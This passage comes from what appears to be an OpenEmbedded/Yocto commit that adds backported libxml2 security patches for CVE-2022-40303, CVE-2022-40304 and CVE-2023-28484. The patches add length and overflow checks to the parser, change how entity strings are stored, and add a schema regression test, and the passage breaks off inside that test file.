+xmlParseEntityValue didn't have a length limitation at all. But without
+XML_PARSE_HUGE, this should eventually trigger an error in xmlGROW.
+
+Thanks to Maddie Stone working with Google Project Zero for the report!
+
+CVE: CVE-2022-40303
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/c846986356fc149915a74972bf198abc266bc2c0]
+Comments: Refreshed hunk
+
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ parser.c | 233 +++++++++++++++++++++++++++++--------------------------
+ 1 file changed, 121 insertions(+), 112 deletions(-)
+
+diff --git a/parser.c b/parser.c
+index 93f031be..79479979 100644
+--- a/parser.c
++++ b/parser.c
+@@ -102,6 +102,8 @@ xmlParseElementEnd(xmlParserCtxtPtr ctxt);
+ * *
+ ************************************************************************/
+
++#define XML_MAX_HUGE_LENGTH 1000000000
++
+ #define XML_PARSER_BIG_ENTITY 1000
+ #define XML_PARSER_LOT_ENTITY 5000
+
+@@ -552,7 +554,7 @@ xmlFatalErr(xmlParserCtxtPtr ctxt, xmlParserErrors error, const char *info)
+ errmsg = "Malformed declaration expecting version";
+ break;
+ case XML_ERR_NAME_TOO_LONG:
+- errmsg = "Name too long use XML_PARSE_HUGE option";
++ errmsg = "Name too long";
+ break;
+ #if 0
+ case:
+@@ -3202,6 +3204,9 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
+ int len = 0, l;
+ int c;
+ int count = 0;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ #ifdef DEBUG
+ nbParseNameComplex++;
+@@ -3267,7 +3272,8 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
+ if (ctxt->instate == XML_PARSER_EOF)
+ return(NULL);
+ }
+- len += l;
++ if (len <= INT_MAX - l)
++ len += l;
+ NEXTL(l);
+ c = CUR_CHAR(l);
+ }
+@@ -3293,13 +3299,13 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
+ if (ctxt->instate == XML_PARSER_EOF)
+ return(NULL);
+ }
+- len += l;
++ if (len <= INT_MAX - l)
++ len += l;
+ NEXTL(l);
+ c = CUR_CHAR(l);
+ }
+ }
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Name");
+ return(NULL);
+ }
+@@ -3338,7 +3344,10 @@ const xmlChar *
+ xmlParseName(xmlParserCtxtPtr ctxt) {
+ const xmlChar *in;
+ const xmlChar *ret;
+- int count = 0;
++ size_t count = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ GROW;
+
+@@ -3362,8 +3371,7 @@ xmlParseName(xmlParserCtxtPtr ctxt) {
+ in++;
+ if ((*in > 0) && (*in < 0x80)) {
+ count = in - ctxt->input->cur;
+- if ((count > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (count > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Name");
+ return(NULL);
+ }
+@@ -3384,6 +3392,9 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
+ int len = 0, l;
+ int c;
+ int count = 0;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+ size_t startPosition = 0;
+
+ #ifdef DEBUG
+@@ -3404,17 +3415,13 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
+ while ((c != ' ') && (c != '>') && (c != '/') && /* test bigname.xml */
+ (xmlIsNameChar(ctxt, c) && (c != ':'))) {
+ if (count++ > XML_PARSER_CHUNK_SIZE) {
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+- return(NULL);
+- }
+ count = 0;
+ GROW;
+ if (ctxt->instate == XML_PARSER_EOF)
+ return(NULL);
+ }
+- len += l;
++ if (len <= INT_MAX - l)
++ len += l;
+ NEXTL(l);
+ c = CUR_CHAR(l);
+ if (c == 0) {
+@@ -3432,8 +3439,7 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
+ c = CUR_CHAR(l);
+ }
+ }
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+ return(NULL);
+ }
+@@ -3459,7 +3465,10 @@ static const xmlChar *
+ xmlParseNCName(xmlParserCtxtPtr ctxt) {
+ const xmlChar *in, *e;
+ const xmlChar *ret;
+- int count = 0;
++ size_t count = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ #ifdef DEBUG
+ nbParseNCName++;
+@@ -3484,8 +3493,7 @@ xmlParseNCName(xmlParserCtxtPtr ctxt) {
+ goto complex;
+ if ((*in > 0) && (*in < 0x80)) {
+ count = in - ctxt->input->cur;
+- if ((count > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (count > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+ return(NULL);
+ }
+@@ -3567,6 +3575,9 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
+ const xmlChar *cur = *str;
+ int len = 0, l;
+ int c;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ #ifdef DEBUG
+ nbParseStringName++;
+@@ -3602,12 +3613,6 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
+ if (len + 10 > max) {
+ xmlChar *tmp;
+
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+- xmlFree(buffer);
+- return(NULL);
+- }
+ max *= 2;
+ tmp = (xmlChar *) xmlRealloc(buffer,
+ max * sizeof(xmlChar));
+@@ -3621,14 +3626,18 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
+ COPY_BUF(l,buffer,len,c);
+ cur += l;
+ c = CUR_SCHAR(cur, l);
++ if (len > maxLength) {
++ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
++ xmlFree(buffer);
++ return(NULL);
++ }
+ }
+ buffer[len] = 0;
+ *str = cur;
+ return(buffer);
+ }
+ }
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+ return(NULL);
+ }
+@@ -3655,6 +3664,9 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ int len = 0, l;
+ int c;
+ int count = 0;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ #ifdef DEBUG
+ nbParseNmToken++;
+@@ -3706,12 +3718,6 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ if (len + 10 > max) {
+ xmlChar *tmp;
+
+- if ((max > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
+- xmlFree(buffer);
+- return(NULL);
+- }
+ max *= 2;
+ tmp = (xmlChar *) xmlRealloc(buffer,
+ max * sizeof(xmlChar));
+@@ -3725,6 +3731,11 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ COPY_BUF(l,buffer,len,c);
+ NEXTL(l);
+ c = CUR_CHAR(l);
++ if (len > maxLength) {
++ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
++ xmlFree(buffer);
++ return(NULL);
++ }
+ }
+ buffer[len] = 0;
+ return(buffer);
+@@ -3732,8 +3743,7 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ }
+ if (len == 0)
+ return(NULL);
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
+ return(NULL);
+ }
+@@ -3759,6 +3769,9 @@ xmlParseEntityValue(xmlParserCtxtPtr ctxt, xmlChar **orig) {
+ int len = 0;
+ int size = XML_PARSER_BUFFER_SIZE;
+ int c, l;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ xmlChar stop;
+ xmlChar *ret = NULL;
+ const xmlChar *cur = NULL;
+@@ -3818,6 +3831,12 @@ xmlParseEntityValue(xmlParserCtxtPtr ctxt, xmlChar **orig) {
+ GROW;
+ c = CUR_CHAR(l);
+ }
++
++ if (len > maxLength) {
++ xmlFatalErrMsg(ctxt, XML_ERR_ENTITY_NOT_FINISHED,
++ "entity value too long\n");
++ goto error;
++ }
+ }
+ buf[len] = 0;
+ if (ctxt->instate == XML_PARSER_EOF)
+@@ -3905,6 +3924,9 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
+ xmlChar *rep = NULL;
+ size_t len = 0;
+ size_t buf_size = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ int c, l, in_space = 0;
+ xmlChar *current = NULL;
+ xmlEntityPtr ent;
+@@ -3925,16 +3925,6 @@
+ while (((NXT(0) != limit) && /* checked */
+ (IS_CHAR(c)) && (c != '<')) &&
+ (ctxt->instate != XML_PARSER_EOF)) {
+- /*
+- * Impose a reasonable limit on attribute size, unless XML_PARSE_HUGE
+- * special option is given
+- */
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+- "AttValue length too long\n");
+- goto mem_error;
+- }
+ if (c == 0) break;
+ if (c == '&') {
+ in_space = 0;
+@@ -4093,6 +4105,11 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
+ }
+ GROW;
+ c = CUR_CHAR(l);
++ if (len > maxLength) {
++ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
++ "AttValue length too long\n");
++ goto mem_error;
++ }
+ }
+ if (ctxt->instate == XML_PARSER_EOF)
+ goto error;
+@@ -4114,16 +4131,6 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
+ } else
+ NEXT;
+
+- /*
+- * There we potentially risk an overflow, don't allow attribute value of
+- * length more than INT_MAX it is a very reasonable assumption !
+- */
+- if (len >= INT_MAX) {
+- xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+- "AttValue length too long\n");
+- goto mem_error;
+- }
+-
+ if (attlen != NULL) *attlen = (int) len;
+ return(buf);
+
+@@ -4194,6 +4201,9 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
+ int len = 0;
+ int size = XML_PARSER_BUFFER_SIZE;
+ int cur, l;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+ xmlChar stop;
+ int state = ctxt->instate;
+ int count = 0;
+@@ -4221,13 +4231,6 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
+ if (len + 5 >= size) {
+ xmlChar *tmp;
+
+- if ((size > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "SystemLiteral");
+- xmlFree(buf);
+- ctxt->instate = (xmlParserInputState) state;
+- return(NULL);
+- }
+ size *= 2;
+ tmp = (xmlChar *) xmlRealloc(buf, size * sizeof(xmlChar));
+ if (tmp == NULL) {
+@@ -4256,6 +4259,12 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
+ SHRINK;
+ cur = CUR_CHAR(l);
+ }
++ if (len > maxLength) {
++ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "SystemLiteral");
++ xmlFree(buf);
++ ctxt->instate = (xmlParserInputState) state;
++ return(NULL);
++ }
+ }
+ buf[len] = 0;
+ ctxt->instate = (xmlParserInputState) state;
+@@ -4283,6 +4292,9 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
+ xmlChar *buf = NULL;
+ int len = 0;
+ int size = XML_PARSER_BUFFER_SIZE;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+ xmlChar cur;
+ xmlChar stop;
+ int count = 0;
+@@ -4310,12 +4322,6 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
+ if (len + 1 >= size) {
+ xmlChar *tmp;
+
+- if ((size > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Public ID");
+- xmlFree(buf);
+- return(NULL);
+- }
+ size *= 2;
+ tmp = (xmlChar *) xmlRealloc(buf, size * sizeof(xmlChar));
+ if (tmp == NULL) {
+@@ -4343,6 +4349,11 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
+ SHRINK;
+ cur = CUR;
+ }
++ if (len > maxLength) {
++ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Public ID");
++ xmlFree(buf);
++ return(NULL);
++ }
+ }
+ buf[len] = 0;
+ if (cur != stop) {
+@@ -4742,6 +4753,9 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
+ int r, rl;
+ int cur, l;
+ size_t count = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ int inputid;
+
+ inputid = ctxt->input->id;
+@@ -4787,13 +4801,6 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
+ if ((r == '-') && (q == '-')) {
+ xmlFatalErr(ctxt, XML_ERR_HYPHEN_IN_COMMENT, NULL);
+ }
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
+- "Comment too big found", NULL);
+- xmlFree (buf);
+- return;
+- }
+ if (len + 5 >= size) {
+ xmlChar *new_buf;
+ size_t new_size;
+@@ -4831,6 +4838,13 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
+ GROW;
+ cur = CUR_CHAR(l);
+ }
++
++ if (len > maxLength) {
++ xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
++ "Comment too big found", NULL);
++ xmlFree (buf);
++ return;
++ }
+ }
+ buf[len] = 0;
+ if (cur == 0) {
+@@ -4875,6 +4889,9 @@ xmlParseComment(xmlParserCtxtPtr ctxt) {
+ xmlChar *buf = NULL;
+ size_t size = XML_PARSER_BUFFER_SIZE;
+ size_t len = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ xmlParserInputState state;
+ const xmlChar *in;
+ size_t nbchar = 0;
+@@ -4958,8 +4975,7 @@ get_more:
+ buf[len] = 0;
+ }
+ }
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
+ "Comment too big found", NULL);
+ xmlFree (buf);
+@@ -5159,6 +5175,9 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
+ xmlChar *buf = NULL;
+ size_t len = 0;
+ size_t size = XML_PARSER_BUFFER_SIZE;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ int cur, l;
+ const xmlChar *target;
+ xmlParserInputState state;
+@@ -5234,14 +5253,6 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
+ return;
+ }
+ count = 0;
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
+- "PI %s too big found", target);
+- xmlFree(buf);
+- ctxt->instate = state;
+- return;
+- }
+ }
+ COPY_BUF(l,buf,len,cur);
+ NEXTL(l);
+@@ -5251,15 +5262,14 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
+ GROW;
+ cur = CUR_CHAR(l);
+ }
++ if (len > maxLength) {
++ xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
++ "PI %s too big found", target);
++ xmlFree(buf);
++ ctxt->instate = state;
++ return;
++ }
+ }
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
+- "PI %s too big found", target);
+- xmlFree(buf);
+- ctxt->instate = state;
+- return;
+- }
+ buf[len] = 0;
+ if (cur != '?') {
+ xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
+@@ -8954,6 +8964,9 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ const xmlChar *in = NULL, *start, *end, *last;
+ xmlChar *ret = NULL;
+ int line, col;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+
+ GROW;
+ in = (xmlChar *) CUR_PTR;
+@@ -8993,8 +9006,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ start = in;
+ if (in >= end) {
+ GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9007,8 +9019,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ if ((*in++ == 0x20) && (*in == 0x20)) break;
+ if (in >= end) {
+ GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9041,16 +9052,14 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ last = last + delta;
+ }
+ end = ctxt->input->end;
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+ }
+ }
+ }
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9063,8 +9072,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ col++;
+ if (in >= end) {
+ GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9072,8 +9080,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ }
+ }
+ last = in;
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9763,6 +9770,9 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
+ int s, sl;
+ int cur, l;
+ int count = 0;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+
+ /* Check 2.6.0 was NXT(0) not RAW */
+ if (CMP9(CUR_PTR, '<', '!', '[', 'C', 'D', 'A', 'T', 'A', '[')) {
+@@ -9796,13 +9806,6 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
+ if (len + 5 >= size) {
+ xmlChar *tmp;
+
+- if ((size > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsgStr(ctxt, XML_ERR_CDATA_NOT_FINISHED,
+- "CData section too big found", NULL);
+- xmlFree (buf);
+- return;
+- }
+ tmp = (xmlChar *) xmlRealloc(buf, size * 2 * sizeof(xmlChar));
+ if (tmp == NULL) {
+ xmlFree(buf);
+@@ -9829,6 +9832,12 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
+ }
+ NEXTL(l);
+ cur = CUR_CHAR(l);
++ if (len > maxLength) {
++ xmlFatalErrMsg(ctxt, XML_ERR_CDATA_NOT_FINISHED,
++ "CData section too big found\n");
++ xmlFree(buf);
++ return;
++ }
+ }
+ buf[len] = 0;
+ ctxt->instate = XML_PARSER_CONTENT;
+--
+GitLab
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch
new file mode 100644
index 0000000000..c19726fe9f
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch
@@ -0,0 +1,104 @@
+From 1b41ec4e9433b05bb0376be4725804c54ef1d80b Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 31 Aug 2022 22:11:25 +0200
+Subject: [PATCH] [CVE-2022-40304] Fix dict corruption caused by entity
+ reference cycles
+
+When an entity reference cycle is detected, the entity content is
+cleared by setting its first byte to zero. But the entity content might
+be allocated from a dict. In this case, the dict entry becomes corrupted
+leading to all kinds of logic errors, including memory errors like
+double-frees.
+
+Stop storing entity content, orig, ExternalID and SystemID in a dict.
+These values are unlikely to occur multiple times in a document, so they
+shouldn't have been stored in a dict in the first place.
+
+Thanks to Ned Williamson and Nathan Wachholz working with Google Project
+Zero for the report!
+
+CVE: CVE-2022-40304
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/1b41ec4e9433b05bb0376be4725804c54ef1d80b]
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ entities.c | 55 ++++++++++++++++--------------------------------------
+ 1 file changed, 16 insertions(+), 39 deletions(-)
+
+diff --git a/entities.c b/entities.c
+index 84435515..d4e5412e 100644
+--- a/entities.c
++++ b/entities.c
+@@ -128,36 +128,19 @@ xmlFreeEntity(xmlEntityPtr entity)
+ if ((entity->children) && (entity->owner == 1) &&
+ (entity == (xmlEntityPtr) entity->children->parent))
+ xmlFreeNodeList(entity->children);
+- if (dict != NULL) {
+- if ((entity->name != NULL) && (!xmlDictOwns(dict, entity->name)))
+- xmlFree((char *) entity->name);
+- if ((entity->ExternalID != NULL) &&
+- (!xmlDictOwns(dict, entity->ExternalID)))
+- xmlFree((char *) entity->ExternalID);
+- if ((entity->SystemID != NULL) &&
+- (!xmlDictOwns(dict, entity->SystemID)))
+- xmlFree((char *) entity->SystemID);
+- if ((entity->URI != NULL) && (!xmlDictOwns(dict, entity->URI)))
+- xmlFree((char *) entity->URI);
+- if ((entity->content != NULL)
+- && (!xmlDictOwns(dict, entity->content)))
+- xmlFree((char *) entity->content);
+- if ((entity->orig != NULL) && (!xmlDictOwns(dict, entity->orig)))
+- xmlFree((char *) entity->orig);
+- } else {
+- if (entity->name != NULL)
+- xmlFree((char *) entity->name);
+- if (entity->ExternalID != NULL)
+- xmlFree((char *) entity->ExternalID);
+- if (entity->SystemID != NULL)
+- xmlFree((char *) entity->SystemID);
+- if (entity->URI != NULL)
+- xmlFree((char *) entity->URI);
+- if (entity->content != NULL)
+- xmlFree((char *) entity->content);
+- if (entity->orig != NULL)
+- xmlFree((char *) entity->orig);
+- }
++ if ((entity->name != NULL) &&
++ ((dict == NULL) || (!xmlDictOwns(dict, entity->name))))
++ xmlFree((char *) entity->name);
++ if (entity->ExternalID != NULL)
++ xmlFree((char *) entity->ExternalID);
++ if (entity->SystemID != NULL)
++ xmlFree((char *) entity->SystemID);
++ if (entity->URI != NULL)
++ xmlFree((char *) entity->URI);
++ if (entity->content != NULL)
++ xmlFree((char *) entity->content);
++ if (entity->orig != NULL)
++ xmlFree((char *) entity->orig);
+ xmlFree(entity);
+ }
+
+@@ -193,18 +176,12 @@ xmlCreateEntity(xmlDictPtr dict, const xmlChar *name, int type,
+ ret->SystemID = xmlStrdup(SystemID);
+ } else {
+ ret->name = xmlDictLookup(dict, name, -1);
+- if (ExternalID != NULL)
+- ret->ExternalID = xmlDictLookup(dict, ExternalID, -1);
+- if (SystemID != NULL)
+- ret->SystemID = xmlDictLookup(dict, SystemID, -1);
++ ret->ExternalID = xmlStrdup(ExternalID);
++ ret->SystemID = xmlStrdup(SystemID);
+ }
+ if (content != NULL) {
+ ret->length = xmlStrlen(content);
+- if ((dict != NULL) && (ret->length < 5))
+- ret->content = (xmlChar *)
+- xmlDictLookup(dict, content, ret->length);
+- else
+- ret->content = xmlStrndup(content, ret->length);
++ ret->content = xmlStrndup(content, ret->length);
+ } else {
+ ret->length = 0;
+ ret->content = NULL;
+--
+GitLab
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch
new file mode 100644
index 0000000000..907f2c4d47
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch
@@ -0,0 +1,79 @@
+From e4f85f1bd2eb34d9b49da9154a4cc3a1bc284f68 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 7 Apr 2023 11:46:35 +0200
+Subject: [PATCH] [CVE-2023-28484] Fix null deref in xmlSchemaFixupComplexType
+
+Fix a null pointer dereference when parsing (invalid) XML schemas.
+
+Thanks to Robby Simpson for the report!
+
+Fixes #491.
+
+CVE: CVE-2023-28484
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/e4f85f1bd2eb34d9b49da9154a4cc3a1bc284f68]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ result/schemas/issue491_0_0.err | 1 +
+ test/schemas/issue491_0.xml | 1 +
+ test/schemas/issue491_0.xsd | 18 ++++++++++++++++++
+ xmlschemas.c | 2 +-
+ 4 files changed, 21 insertions(+), 1 deletion(-)
+ create mode 100644 result/schemas/issue491_0_0.err
+ create mode 100644 test/schemas/issue491_0.xml
+ create mode 100644 test/schemas/issue491_0.xsd
+
+diff --git a/result/schemas/issue491_0_0.err b/result/schemas/issue491_0_0.err
+new file mode 100644
+index 00000000..9b2bb969
+--- /dev/null
++++ b/result/schemas/issue491_0_0.err
+@@ -0,0 +1 @@
++./test/schemas/issue491_0.xsd:8: element complexType: Schemas parser error : complex type 'ChildType': The content type of both, the type and its base type, must either 'mixed' or 'element-only'.
+diff --git a/test/schemas/issue491_0.xml b/test/schemas/issue491_0.xml
+new file mode 100644
+index 00000000..e2b2fc2e
+--- /dev/null
++++ b/test/schemas/issue491_0.xml
+@@ -0,0 +1 @@
++<Child xmlns="http://www.test.com">5</Child>
+diff --git a/test/schemas/issue491_0.xsd b/test/schemas/issue491_0.xsd
+new file mode 100644
+index 00000000..81702649
+--- /dev/null
++++ b/test/schemas/issue491_0.xsd
+@@ -0,0 +1,18 @@
++<?xml version='1.0' encoding='UTF-8'?>
++<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns="http://www.test.com" targetNamespace="http://www.test.com" elementFormDefault="qualified" attributeFormDefault="unqualified">
